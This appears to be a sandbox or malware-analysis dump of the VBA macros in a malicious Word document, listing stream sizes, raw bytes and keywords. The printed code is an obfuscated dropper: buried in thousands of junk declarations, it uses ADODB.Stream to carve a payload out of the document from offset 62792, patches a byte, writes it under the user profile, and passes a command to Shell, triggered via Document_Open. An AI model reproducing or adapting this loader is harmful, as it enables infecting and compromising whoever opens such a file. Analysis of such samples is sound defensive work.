Dim H8U51(10 To 433) As String

H8U51(10) = "OXkdT"

Dim F7SOQ(18 To 489) As Long

F7SOQ(18) = (126 / 963) / 32

Dim B1ptR(92) As Byte

B1ptR(92) = 254

Dim B1E7i As Long

B1E7i = (-451 + 601) - 3

Dim LuC6X(27 To 180) As String

LuC6X(27) = "T10VB"

Dim Inz8x(25 To 73) As Long

Inz8x(25) = (460 + 21) / 11

Dim Dykvf As Byte

Dim UsEEv As Byte

Dim J3IU5 As String

J3IU5 = UrlR1

Dim FJCT0 As String

FJCT0 = Ac5W6

Dim TbR8V(1 To 147) As String

TbR8V(1) = "Y7745"

Dim EHPw0(15 To 212) As Long

EHPw0(15) = (-341 - 426) / 20

Dim DVnJi(27 To 477) As String

DVnJi(27) = "GzOjv"

Dim NW6p8 As Byte

Dim D6h37 As Byte

Dim FwIFb(79) As Byte

FwIFb(79) = 119

Dim JA4xm As String

JA4xm = "UmDpA"

Dim T2V7i(21 To 68) As Long

T2V7i(21) = (684 / 734) - 13

Dim Gnay3(7 To 104) As Long

Gnay3(7) = (572 + 784) - 18

Dim W7K57 As Byte

Dim M3P4t As Long

M3P4t = (-7 - 600) + 8

Dim EZD6g(46) As Byte

EZD6g(46) = 99

Dim E0ArF As Byte

Dim K0u3O(26 To 100) As Long

K0u3O(26) = (858 / 645) + 16

Dim JAt20(26) As Byte

JAt20(26) = 2

Dim GH7R6(11) As Byte

GH7R6(11) = 100

Dim Q1Z8R(80) As Byte

Q1Z8R(80) = 38

Dim S8f8P As Long

S8f8P = (633 - 582) - 27

Dim QDpZG As Long

QDpZG = (-383 + 777) / 49

Dim I3cWu As Byte

I3cWu = 228

Dim D60h2 As Byte

D60h2 = 254

Dim R4246 As Byte

Dim ByhT5(9 To 255) As Long

ByhT5(9) = (-309 + 243) - 8

.Type = 1

Dim M70t5(18 To 283) As Long

M70t5(18) = (-363 / 874) + 8

Dim QcItR As Byte

QcItR = 82

Dim PErd4(66) As Byte

PErd4(66) = 46

Dim RJD57(53) As Byte

RJD57(53) = 96

Dim UdLIC(3 To 256) As String

UdLIC(3) = Jzed2

Dim T0t5u(95) As Byte

T0t5u(95) = 61

Dim TE2BA As String

TE2BA = WHhbG

Dim A05tr As Long

A05tr = (87 - 563) - 1

Dim QVj2A(1 To 414) As String

QVj2A(1) = L50h6

Dim FF0qk(17) As Byte

FF0qk(17) = 212

Dim J2Oo7(30 To 446) As String

J2Oo7(30) = "YB32w"

.Open

Dim F6e0j As Byte

F6e0j = 23

Dim VpzpC(42) As Byte

VpzpC(42) = 199

.Write FW5Vg

Dim URyPU(4 To 360) As Long

URyPU(4) = (418 / 242) / 45

Ez2bF = 169

Dim Lx3y2(0 To 1) As String

Lx3y2(0) = "Dw75W"

Dim PBnGN As String

PBnGN = "PhHn0"

Dim O0tFy(20 To 168) As Long

O0tFy(20) = (-397 + 444) - 48

Dim LGp6q As Long

LGp6q = (984 / 460) / 11

Dim BV1ha As String

BV1ha = "V8qkI"

Dim WrA2d(15 To 252) As String

WrA2d(15) = SbxRg

ReDim Gu8Xe(UBound(FW5Vg) + Ez2bF)

Dim OEP8X As Long

OEP8X = (-499 / 36) + 18

Dim NCPvi As String

NCPvi = SgThF

Dim Yrt6o As String

Yrt6o = "J8IL7"

Dim I6LL6(10 To 52) As String

I6LL6(10) = "DD0qd"

Dim JZMjI As Byte

JZMjI = 29

Dim QwoJ8 As String

QwoJ8 = "Iundr"

Dim MS04Q As Byte

MS04Q = 47

Dim KPnWw As Long

KPnWw = (-728 - 812) - 37

Dim Bj6FC As String

Bj6FC = "QXHK6"

Dim UyUCU As Byte

Dim L88zU As Byte

L88zU = 113

Dim SpFgy(22) As Byte

SpFgy(22) = 68

Dim Cdqbn As String

Cdqbn = L4k6Z

Dim H0XK7 As String

H0XK7 = AJQF4

Dim M7Bio(22 To 27) As String

M7Bio(22) = DQZ20

Dim HXSQn(31 To 147) As String

HXSQn(31) = Ft8Bk

Dim U5HU6(30 To 303) As String

U5HU6(30) = "YK22i"

Dim Y7pvu As Byte

Dim Cj68m(91) As Byte

Cj68m(91) = 191

ZQcI5 = 62792

For V3a1w = 62792 To UBound(FW5Vg)

Qq73S = Eb3be

MmLPO = SYbzA

FFBfg = B4bP1

ADOq8 = 132

J302e = I2sZr

Z48wG = VvZ0F

Gu8Xe(V3a1w - 62792) = FW5Vg(V3a1w)

C14e5 = QKBEp

V30b8 = RdHtR

Next

Dim DkEHg(34 To 166) As Long

DkEHg(34) = (-189 / 422) + 28

Dim YapM0(14 To 40) As Long

YapM0(14) = (-28 / 364) / 42

Dim TkHQU(32 To 420) As String

TkHQU(32) = "XuidR"

Dim J74kH(2 To 21) As Long

J74kH(2) = (-575 / 154) - 2

Dim QRDfP(21 To 171) As Long

QRDfP(21) = (-754 / 673) - 5

Dim T368b(19) As Byte

T368b(19) = 27

Gu8Xe(ADOq8) = Ez2bF

Dim WF687 As String

WF687 = X5D63

Dim NxyRH As Byte

NxyRH = 74

Dim RLxl1 As String

RLxl1 = "X6wh0"

Open Oj62U For Binary As #6

Dim Z87Cn(90) As Byte

Z87Cn(90) = 82

Put #6, , Gu8Xe

Dim NEX75(11 To 150) As String

NEX75(11) = "EHw60"

Dim Mu7id(24 To 263) As String

Mu7id(24) = ZdOQk

Dim TxsAb(7 To 37) As Long

TxsAb(7) = (-258 + 208) / 4

Dim S8bLT As Byte

S8bLT = 253

Dim Crs4A(18 To 228) As Long

Crs4A(18) = (535 + 57) - 12

Dim FzI6j(8) As Byte

FzI6j(8) = 244

Dim IAJgk As String

IAJgk = "M88Xk"

Dim QQ3P0 As String

QQ3P0 = DW7qw

Dim Rquv5 As Long

Rquv5 = (677 + 286) - 48

Dim S6p26 As String

S6p26 = AC4wm

Dim OpjqX(25) As Byte

OpjqX(25) = 77

Dim O66TD As String

O66TD = SkX5n

Close #6

Dim WpIoU(14 To 265) As Long

WpIoU(14) = (-869 - 90) + 2

Dim MkkVn(38) As Byte

MkkVn(38) = 28

Dim Pa3K2(25 To 233) As Long

Pa3K2(25) = (-434 + 189) - 32

Dim K7iv6(21 To 490) As String

K7iv6(21) = K6Lww

Dim NUIv4(7 To 14) As Long

NUIv4(7) = (576 - 62) / 34

Dim AbK61 As Byte

Dim WV2q6(21 To 281) As Long

WV2q6(21) = (-641 + 415) + 20

Dim O0302(8 To 390) As String

O0302(8) = J7ie0

Dim Q88WO As Long

Q88WO = (-652 + 702) + 43

Dim QH5Gc As String

QH5Gc = "LMP6t"

Dim URwC7 As Long

URwC7 = (-974 - 272) + 25

Dim GZUB0 As Byte

Dim T5F8J As String

T5F8J = Ic1Eh

Dim H7U0t As Byte

H7U0t = 185

Dim E01G7 As Byte

End With

Dim M4G2b(37) As Byte

M4G2b(37) = 21

Dim Hmja5(16 To 115) As Long

Hmja5(16) = (604 + 348) - 23

Dim Yq4b6 As String

Yq4b6 = "PA7En"

Dim Lrxr4 As Long

Lrxr4 = (-948 / 663) / 1

Dim A3kNR As Long

A3kNR = (-405 / 871) - 34

Dim L6X4W(29) As Byte

L6X4W(29) = 246

Dim H4vCl As Byte

Dim SnR7P As Long

SnR7P = (883 - 960) / 32

Dim EA77f As Byte

Dim Ba0su(25 To 216) As Long

Ba0su(25) = (645 - 996) / 7

Dim GRZ8p(17 To 42) As String

GRZ8p(17) = DEOo8

Dim G50D0 As Long

G50D0 = (414 + 157) - 3

Dim E1p3y As String

E1p3y = M0huq

Dim Q80xi As String

Q80xi = E40L2

Dim BvUd1(9 To 133) As Long

BvUd1(9) = (-959 + 284) / 9

Dim O85R8 As Long

O85R8 = (314 - 759) - 2

Dim Atdh3 As Byte

Atdh3 = 0

Dim E4yc5 As Long

E4yc5 = (-166 / 740) - 48

Dim I8KSQ(12 To 17) As String

I8KSQ(12) = "JmTzx"

Dim IR4K2 As Long

IR4K2 = (-658 + 63) - 19

Dim PfM2W As Byte

PfM2W = 160

Dim Z0ejl As Long

Z0ejl = (-733 - 497) - 46

Dim D306l As String

D306l = DBJaS

Dim PDT56(97) As Byte

PDT56(97) = 231

Dim EdbfP As Byte

EdbfP = 74

Dim C5yy5(28) As Byte

C5yy5(28) = 161

Dim GcRAS As Byte

Dim OI0H3 As String

OI0H3 = Hf724

Dim WBD52(20 To 47) As String

WBD52(20) = LGvtQ

Dim X3k4t(4 To 447) As String

X3k4t(4) = "Zo6UE"

Dim Q2Q4P As Long

Q2Q4P = (823 - 402) + 5

Dim E03Yb(20 To 27) As Long

E03Yb(20) = (-275 + 970) + 27

Dim A1P3f(11 To 100) As String

A1P3f(11) = OkaWA

Dim UHd6q(1) As Byte

UHd6q(1) = 183

Dim XDTN8(28 To 36) As String

XDTN8(28) = JrPYW

Dim PueOR As Byte

PueOR = 176

Dim E52jB(31 To 232) As String

E52jB(31) = F6kH3

Dim PR1Kt As Long

PR1Kt = (667 - 260) - 22

Dim McG7w As Byte

Dim IuY2U(25) As Byte

IuY2U(25) = 90

Dim A8XHS(9 To 62) As String

A8XHS(9) = Hf7hK

Dim D5NeH As Long

D5NeH = (-480 / 928) + 8

Dim Z0C28 As Byte

Z0C28 = 121

Dim DzJf7 As Long

DzJf7 = (215 + 99) / 4

Dim IM6UA(2 To 268) As Long

IM6UA(2) = (-397 / 517) / 17

Dim TJ2Ep As String

TJ2Ep = "OvD2n"

Dim SJnW2 As String

SJnW2 = "BNFSv"

Dim HEffn(95) As Byte

HEffn(95) = 174

Dim Tv8vb As Byte

Dim JQNt7 As Long

JQNt7 = (147 / 453) + 27

Dim K3GL0(23 To 255) As Long

K3GL0(23) = (887 - 65) + 43

Dim CL270(33 To 308) As String

CL270(33) = "OJ4L1"

Dim WL7v3(1 To 73) As Long

WL7v3(1) = (209 - 283) - 16

Dim Q5AZ7(9 To 473) As Long

Q5AZ7(9) = (-166 / 532) + 41

Dim CE6wW As String

CE6wW = "Vs33Z"

Dim DPxT7 As Byte

Dim DSDr0(49) As Byte

DSDr0(49) = 191

Dim Q0MEh(55) As Byte

Q0MEh(55) = 82

Dim Qe281(74) As Byte

Qe281(74) = 74

Dim Ayi03 As Byte

Dim SLS3C As Long

SLS3C = (977 - 967) / 7

Dim C4pL6(0 To 1) As String

C4pL6(0) = "JqSOJ"

End Sub

Public Sub sh1(KAJuJ)

Dim STI26 As Byte

Dim A0xHM(26 To 369) As String

A0xHM(26) = DQRn4

Dim Q1sr5 As String

Q1sr5 = ZQ451

Dim Y3smw(20 To 313) As Long

Y3smw(20) = (138 + 109) - 48

Dim I3yT0 As String

I3yT0 = ME4k5

Dim LjSQB As String

LjSQB = VAhvE

Dim A4zLH As Byte

A4zLH = 0

Dim TsQ3h As Byte

Dim CoanH As Byte

CoanH = 221

Dim I1V6d As Long

I1V6d = (137 / 362) - 19

Dim L07b0(3 To 329) As Long

L07b0(3) = (-288 - 699) / 32

Dim LHC85 As String

LHC85 = "LYC2N"

Dim VQDRI As String

VQDRI = MeKE6

Dim T5PPC As Byte

Dim U2B0a(9 To 186) As Long

U2B0a(9) = (-955 + 123) - 14

Dim XCgdc As Byte

Dim Zt0dT As Byte

Dim PLg3l(48) As Byte

PLg3l(48) = 13

Dim RpE5C As Byte

Dim WmXR7 As String

WmXR7 = Mav4d

Dim JCCHw As String

JCCHw = "BqdZA"

Dim I78AF As Byte

Dim LE5S0(84) As Byte

LE5S0(84) = 227

Dim YNSD0 As String

YNSD0 = "C4dm6"

Dim BRt8w(14 To 447) As Long

BRt8w(14) = (-410 - 969) - 47

Dim J6FpP(96) As Byte

J6FpP(96) = 30

Dim KjvOJ(98) As Byte

KjvOJ(98) = 143

Dim XbFDT(12) As Byte

XbFDT(12) = 91

Dim PJUqj As Byte

Dim G3Gzt(5 To 45) As Long

G3Gzt(5) = (728 / 168) + 5

Dim DB0b8(2 To 141) As Long

DB0b8(2) = (-96 + 875) + 49

Dim Rq3H3 As Long

Rq3H3 = (-705 - 628) - 47

Dim Ew4iZ As Long

Ew4iZ = (789 - 851) + 44

Dim MUF8J(97) As Byte

MUF8J(97) = 164

Dim Y3uBE(23 To 476) As Long

Y3uBE(23) = (-145 + 749) / 8

Dim Mz6eO As Long

Mz6eO = (859 / 602) + 7

Dim G35S1 As Byte

Dim O2gTH(0) As Byte

O2gTH(0) = 148

Dim D4H7v As Byte

D4H7v = 80

Dim S0lpP As String

S0lpP = Iz1S7

Dim J886S As Byte

Dim GB7LY As Long

GB7LY = (237 + 801) - 27

Dim PkcLo As String

PkcLo = ZQ3QJ

Dim K0633 As Byte

Dim J5j4c(7 To 91) As String

J5j4c(7) = "Ig7uA"

Dim HdY8v As Long

HdY8v = (154 - 193) - 20

Dim J61Ot As Byte

Dim J2HgG(30 To 488) As String

J2HgG(30) = "PRe2L"

Dim NRd6k As Long

NRd6k = (294 / 34) + 48

Shell KAJuJ

Dim WE8cz(1 To 363) As Long

WE8cz(1) = (545 + 700) / 25

Dim Lptm3 As Byte

Lptm3 = 26

Dim Eb7fK As String

Eb7fK = Igu02

Dim ZA7Yw(16 To 306) As Long

ZA7Yw(16) = (-27 + 139) - 18

End Sub
                    VBA File Name: Module1.bas, Stream Size: 675
                    General
                    Stream Path:VBA/Module1
                    VBA File Name:Module1.bas
                    Stream Size:675
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . w . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 77 02 00 00 00 00 00 00 01 00 00 00 e8 38 9e ca 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                    VBA Code Keywords

                    Keyword
                    Attribute
                    VB_Name
                    VBA Code
                    Attribute VB_Name = "Module1"
                    VBA File Name: ThisDocument.cls, Stream Size: 42215
                    General
                    Stream Path:VBA/ThisDocument
                    VBA File Name:ThisDocument.cls
                    Stream Size:42215
                    Data ASCII:. . . . . . . . . . 8 . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:01 16 01 00 00 f0 00 00 00 96 38 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 9d 38 00 00 d1 82 00 00 00 00 00 00 01 00 00 00 e8 38 fc 92 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                    VBA Code Keywords

                    Keyword
                    JJzIB
                    False
                    OMLpT
                    VB_GlobalNameSpace
                    "RUtlW"
                    Binary
                    Sijqv
                    VB_Exposed
                    AjSXV
                    CStr(Environ("USERPROFILE"))
                    IVOcx
                    ZIGAQ
                    "SvjJX"
                    "RNvYF"
                    NJWek
                    Pvtdr
                    TxHCo
                    LTFyB
                    KRfkL
                    VB_Customizable
                    NoDON
                    VB_Creatable
                    "HIdCG"
                    AfOpe
                    UlBiv
                    XBsOm
                    "R_O"
                    TyTNz
                    UbRVW
                    SJAPn
                    .Type
                    VB_Name
                    Environ("NUMB"
                    "DyjxX"
                    GBdyo
                    "\text.doc"
                    .Write
                    Public
                    ReDim
                    "RVvYR"
                    "HfFAf"
                    Resume
                    HZibc
                    BIXuv
                    EqDjd
                    "FXzug"
                    FWyLu
                    "EQoob"
                    Shell
                    Bpabn
                    VB_Base
                    Dvhoi
                    WcTgf
                    JiIyy
                    VWgRj
                    .Open
                    DKNai
                    ZQQNT
                    "CtDSH"
                    NGKGP
                    ICvSv
                    VB_TemplateDerived
                    XSppB
                    LKlOJ
                    MvykX
                    BnmDS
                    QHGsD
                    BxYtT
                    Document_Open()
                    NAnEu
                    QPyeV
                    CySUV
                    LBzBN
                    String
                    ZmoPt
                    "SSORS")
                    CreateObject("adodb.stream")
                    "ThisDocument"
                    "LBfNF"
                    PqAkQ
                    "_PR"
                    "IAqLs"
                    UDtTh
                    "OCE"
                    XmCnj
                    Error
                    EyMnI
                    Attribute
                    BHzgp
                    VB_PredeclaredId
                    Close
                    LKbGd
                    JOHVE
                    VZLVx
                    OQhFY
                    "HOqcN"
                    VBA Code
                    Attribute VB_Name = "ThisDocument"

Attribute VB_Base = "1Normal.ThisDocument"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = True

Attribute VB_TemplateDerived = True

Attribute VB_Customizable = True

Public Sub test1(SG07j, B78Bz)

Dim Z6Vtd(2 To 270) As Long

Z6Vtd(2) = (-921 / 17) + 27

Dim XxCry(21 To 252) As String

XxCry(21) = "RNvYF"

Dim L16Ns As Long

L16Ns = (513 / 647) / 21

Dim T3o6C(29 To 50) As String

T3o6C(29) = JiIyy

Dim WPY5a As String

WPY5a = I70P3

Dim T6DRG(68) As Byte

T6DRG(68) = 167

Dim FY4tj As String

FY4tj = "Dv1Sx"

Dim JySvd(5 To 441) As Long

JySvd(5) = (622 - 749) / 16

Dim HVgMV(40) As Byte

HVgMV(40) = 173

Dim Dlv68(15 To 195) As String

Dlv68(15) = "YH3V8"

Dim NAnEu As Long

NAnEu = (928 + 537) - 5

Dim Uq8X3 As Byte

Uq8X3 = 213

Dim AH5LQ(15 To 88) As String

AH5LQ(15) = HZibc

Dim Hj50H(11 To 422) As Long

Hj50H(11) = (-40 / 551) - 42

Dim MYcw1(20 To 237) As String

MYcw1(20) = BcLv2

Dim BP33O(3 To 416) As String

BP33O(3) = "VW6JF"

Dim N18dI As Byte

N18dI = 106

Dim YrDH8 As Long

YrDH8 = (-855 + 784) + 44

Dim OQhFY As Byte

Dim BO00p As String

BO00p = "Qh343"

Dim WDJUU(6 To 221) As String

WDJUU(6) = "HOqcN"

Dim KG8wK(34 To 115) As String

KG8wK(34) = "MFxd6"

Dim ZIGAQ As Long

ZIGAQ = (-962 / 370) - 2

Dim YfY6A As String

YfY6A = "FXzug"

Dim I265X As Long

I265X = (-478 - 33) - 23

Dim J0G42 As String

J0G42 = C0Vfq

Dim O15AO As String

O15AO = BxYtT

Dim F5Yo4 As Byte

Dim DKNai As String

DKNai = OhAx1

Dim SJAPn As Long

SJAPn = (830 + 762) / 20

Dim ZU5MU(27) As Byte

ZU5MU(27) = 233

Dim Dvhoi As Long

Dvhoi = (576 - 590) / 15

Dim Iu0ef(10 To 101) As String

Iu0ef(10) = NzkP8

Dim Ayt2P As String

Ayt2P = "RVvYR"

Dim HNP0B(30 To 296) As Long

HNP0B(30) = (432 / 20) + 14

Dim DGhXX(9 To 17) As Long

DGhXX(9) = (644 + 448) + 14

Dim Ghtv5 As Long

Ghtv5 = (-356 - 236) / 34

Dim EZgIt(14 To 475) As String

EZgIt(14) = Eg1q6

Dim K17RU(9 To 380) As Long

K17RU(9) = (-316 / 906) + 7

Dim B205R As String

B205R = F2gVH

Dim XM7np(29 To 194) As String

XM7np(29) = LKbGd

Dim JEh0y(0 To 1) As String

JEh0y(0) = G1jcm

Dim J5wcd As String

J5wcd = "DyjxX"

Dim NcEED(16 To 206) As Long

NcEED(16) = (724 - 146) + 40

Dim PddFF(76) As Byte

PddFF(76) = 185

Dim Z7v0Q As String

Z7v0Q = GE8D2

Dim PG21j As String

PG21j = CySUV

Dim ZLXC1 As Byte

Dim T0G6r(7 To 356) As String

T0G6r(7) = "MaI72"

Dim CF1sh(88) As Byte

CF1sh(88) = 12

Dim M4BLO(4 To 28) As Long

M4BLO(4) = (359 - 415) + 44

Dim Fw3vH As Long

Fw3vH = (247 + 589) + 41

Dim RTkJ0() As Byte

Dim It8ni As Long

It8ni = (-302 + 50) / 39

Dim GM1v5 As Long

GM1v5 = (972 + 796) - 26

Dim CEWgw(28 To 303) As String

CEWgw(28) = "D1cCH"

Dim Pvtdr As String

Pvtdr = W8fJH

Dim DE05S As String

DE05S = "SvjJX"

Dim DypKj(11 To 126) As Long

DypKj(11) = (-480 + 784) / 22

Dim A0ylA As Byte

Dim LH7Q1 As Long

LH7Q1 = (-724 - 128) - 11

Dim V7YP1 As Byte

Dim Gb6x8 As Long

Gb6x8 = (297 - 57) - 10

Dim AzPD7(49) As Byte

AzPD7(49) = 60

Dim A8MDS(2 To 139) As Long

A8MDS(2) = (659 - 324) + 15

Dim T4MG4 As String

T4MG4 = D18NP

Dim TFsn8(62) As Byte

TFsn8(62) = 76

Dim IVYW5(30 To 85) As String

IVYW5(30) = RzEI8

Dim NJWek As String

NJWek = "Oj3p5"

Dim UfYzs(55) As Byte

UfYzs(55) = 132

Dim MwE07(7) As Byte

MwE07(7) = 201

Dim Nr0bV As Byte

Dim CkcpF(99) As Byte

CkcpF(99) = 239

Dim EZ3r3(32 To 170) As Long

EZ3r3(32) = (162 + 950) + 25

Dim T1GVo As Byte

T1GVo = 151

Dim T0ZTv As Byte

T0ZTv = 91

Dim AfOpe As Long

AfOpe = (373 - 274) + 37

Dim ZPG4y(30 To 450) As String

ZPG4y(30) = FG8Ql

Dim Q8mqW As Byte

Dim Mlh44(28 To 169) As String

Mlh44(28) = "F0B2X"

Dim Sijqv As Byte

Sijqv = 170

Dim HS2f0(51) As Byte

HS2f0(51) = 238

Dim W8rbm As Byte

Dim XmCnj As String

XmCnj = Us6o1

Dim Sq28v As Byte

Sq28v = 89

Dim BnmDS As Long

BnmDS = (-28 + 623) - 35

Dim EiyW4(25) As Byte

EiyW4(25) = 230

Dim UraR5(40) As Byte

UraR5(40) = 99

Dim PUR0v As Byte

Dim X0m11(20 To 78) As String

X0m11(20) = "U5H2Z"

With CreateObject("adodb.stream")

Dim BHzgp As Long

BHzgp = (774 - 578) - 37

Dim TXkcs(5 To 70) As Long

TXkcs(5) = (439 - 488) / 37

Dim QHGsD As Byte

Dim BX28o(98) As Byte

BX28o(98) = 72

Dim W8xkN As Byte

W8xkN = 5

Dim TxHCo As Byte

TxHCo = 151

Dim ENEpV(15 To 281) As Long

ENEpV(15) = (-211 / 473) + 40

Dim A06q8 As String

A06q8 = "GN253"

Dim S248R As String

S248R = Z2VyP

Dim LsvZ7(18 To 331) As Long

LsvZ7(18) = (558 / 278) - 28

Dim G27FB(1 To 443) As Long

G27FB(1) = (-543 - 254) / 41

Dim Eug66(86) As Byte

Eug66(86) = 229

Dim Vb22q(90) As Byte

Vb22q(90) = 183

Dim XoaL7(14 To 275) As Long

XoaL7(14) = (159 - 453) + 33

Dim H1zFm(2 To 239) As String

H1zFm(2) = "UE1iu"

Dim Fg4l1(4 To 148) As String

Fg4l1(4) = "IqK88"

Dim GAF6F(28 To 166) As Long

GAF6F(28) = (-521 - 694) - 18

Dim Won7L(90) As Byte

Won7L(90) = 92

Dim KotsD(14 To 90) As Long

KotsD(14) = (-782 - 398) - 23

Dim Vdxb1(23 To 24) As Long

Vdxb1(23) = (590 / 885) + 41

Dim KTlJi(3 To 377) As Long

KTlJi(3) = (-423 / 911) - 17

Dim B4lhk As String

B4lhk = CFq3n

.Type = 1

Dim D63dd As Long

D63dd = (973 + 343) + 33

Dim FDF4N As Byte

FDF4N = 16

Dim Y1Nl5(27 To 423) As String

Y1Nl5(27) = UDtTh

Dim Cs0R0(19 To 124) As String

Cs0R0(19) = "HfFAf"

Dim X1p7U As Long

X1p7U = (950 / 873) / 47

Dim R2c6v As String

R2c6v = D6zNx

Dim B34TO As Long

B34TO = (-161 / 416) + 5

Dim TTFj2 As String

TTFj2 = NGKGP

Dim Nu4T2(0 To 1) As Long

Nu4T2(0) = (825 / 270) - 15

.Open

Dim DsPYr(58) As Byte

DsPYr(58) = 144

Dim Y4seF As String

Y4seF = "MiHQ1"

Dim LC6S4(10) As Byte

LC6S4(10) = 140

Dim T1aQ4 As Long

T1aQ4 = (-451 - 427) + 12

Dim IOEQ4 As Byte

Dim OuZ8q As String

OuZ8q = Y2Jti

Dim X281p(17 To 232) As Long

X281p(17) = (362 - 693) - 42

Dim R0y38 As Long

R0y38 = (-428 / 908) + 11

Dim JlHnA(9 To 346) As Long

JlHnA(9) = (408 - 939) - 28

Dim D73Ej As Byte

Dim DVx10(6 To 28) As Long

DVx10(6) = (287 / 732) / 9

Dim Sd4C8 As Byte

Dim T2nwq As Byte

Dim FACoO(4 To 335) As Long

FACoO(4) = (-383 + 419) / 20

Dim Lf858 As String

Lf858 = GLr0d

Dim OTSOx(4 To 464) As String

OTSOx(4) = "In832"

Dim GOewz(51) As Byte

GOewz(51) = 54

Dim PmB80(24) As Byte

PmB80(24) = 7

Dim Nm7yu As String

Nm7yu = "RUtlW"

Dim JP35x As String

JP35x = MvykX

Dim M78t5(39) As Byte

M78t5(39) = 64

Dim Jqn4z(82) As Byte

Jqn4z(82) = 229

Dim HT1BL As Long

HT1BL = (956 / 463) + 39

Dim Sh6B5 As Long

Sh6B5 = (963 + 998) - 44

Dim ZVW1Y(65) As Byte

ZVW1Y(65) = 243

.Write SG07j

Dim UA6uq As String

UA6uq = "SxTq1"

Dim RXnfC(22 To 447) As Long

RXnfC(22) = (108 / 292) + 19

Dim HM2qo As Byte

Dim DR87R As String

DR87R = JS08j

Dim JiK8G(91) As Byte

JiK8G(91) = 209

Dim Bd8PI(31) As Byte

Bd8PI(31) = 5

Dim KS30R(99) As Byte

KS30R(99) = 70

Dim J5Olx As String

J5Olx = N6b2y

Dim R4238(25 To 187) As Long

R4238(25) = (-908 - 590) + 11

Dim Wa1rO As Byte

Wa1rO = 202

Dim JOHVE As Byte

JOHVE = 41

Dim ICvSv As String

ICvSv = Ace62

Dim H0EKF(14 To 21) As String

H0EKF(14) = "KQaR1"

Dim EQbHq(27 To 288) As String

EQbHq(27) = "S1B2c"

Dim T5AC3(4 To 269) As String

T5AC3(4) = "EQoob"

Dim Hdkk7(25 To 393) As Long

Hdkk7(25) = (-873 / 710) + 16

Dim JPIU3(62) As Byte

JPIU3(62) = 29

Dim LKlOJ As String

LKlOJ = "HIdCG"

Dim Lxa6P(23 To 97) As String

Lxa6P(23) = "N7HO2"

Dim N7ds4 As Long

N7ds4 = (14 + 884) + 23

Dim J70a6(10 To 442) As String

J70a6(10) = "Jg4kN"

Dim VWgRj As String

VWgRj = "Um027"

Dim V0VyL As Byte

Dim O6DJP As Byte

Dim P0B8n As Byte

Dim NZm7o As String

NZm7o = A7h7X

Dim Wx1mB(28 To 46) As String

Wx1mB(28) = "IAqLs"

Nr0bV = 140

Dim W6cBD As Byte

Dim IE28H As Byte

Dim Ke3TM(44) As Byte

Ke3TM(44) = 34

Dim IIbp2 As Byte

Dim NS8bc(0) As Byte

NS8bc(0) = 29

Dim KjY57(16 To 90) As String

KjY57(16) = US5tA

Dim E2fXs(8 To 68) As Long

E2fXs(8) = (54 / 242) - 45

Dim Dbq3a(0 To 1) As String

Dbq3a(0) = R0be7

Dim Cdn4b(8 To 279) As Long

Cdn4b(8) = (-1 / 232) - 21

Dim YHk1I As Byte

Dim D3AZC(8 To 375) As String

D3AZC(8) = "JhH55"

Dim EyMnI As Byte

EyMnI = 117

Dim Bmb52(77) As Byte

Bmb52(77) = 101

Dim X3bT0(25 To 125) As Long

X3bT0(25) = (151 - 755) - 34

Dim T5XW8 As Byte

T5XW8 = 9

Dim AjSXV As Byte

ReDim RTkJ0(UBound(SG07j) + Nr0bV)

FWyLu = 62792

For Yc8Rn = 62792 To UBound(SG07j)

Ytg1B = A7fA2

GBdyo = Pt7t4

M5omZ = O5Fw8

G48Yg = 132

L733s = K83vS

X0O3e = Nzfy5

RTkJ0(Yc8Rn - 62792) = SG07j(Yc8Rn)

MG03r = XBsOm

NoDON = LBzBN

Next

Dim ZOoi3 As String

ZOoi3 = Bpcx3

Dim Oq4O7(4 To 280) As Long

Oq4O7(4) = (550 - 414) / 24

Dim M5r4q As Long

M5r4q = (-841 - 58) / 9

Dim PqC3P As String

PqC3P = "J052Y"

Dim XHDa8 As Long

XHDa8 = (-935 + 672) - 34

Dim Btv4s(38) As Byte

Btv4s(38) = 22

Dim R2ek8(29 To 88) As String

R2ek8(29) = B2864

Dim OZmq5 As Long

OZmq5 = (498 - 852) + 25

Dim S8G87(59) As Byte

S8G87(59) = 254

Dim GwL48 As String

GwL48 = "VAZ1L"

Dim Ibh16 As Long

Ibh16 = (617 + 665) - 40

RTkJ0(G48Yg) = Nr0bV

Dim S02ZX As Long

S02ZX = (-788 / 872) - 39

Dim S0omk As Byte

Dim X6nj0(26) As Byte

X6nj0(26) = 240

Dim K7BVf As Byte

K7BVf = 232

Dim HqBS3 As Byte

HqBS3 = 250

Dim BnoOq(4 To 241) As Long

BnoOq(4) = (675 - 7) + 35

Dim T43CU As String

T43CU = B3Q2l

Dim M13Eo As Byte

M13Eo = 159

Dim L5af6 As String

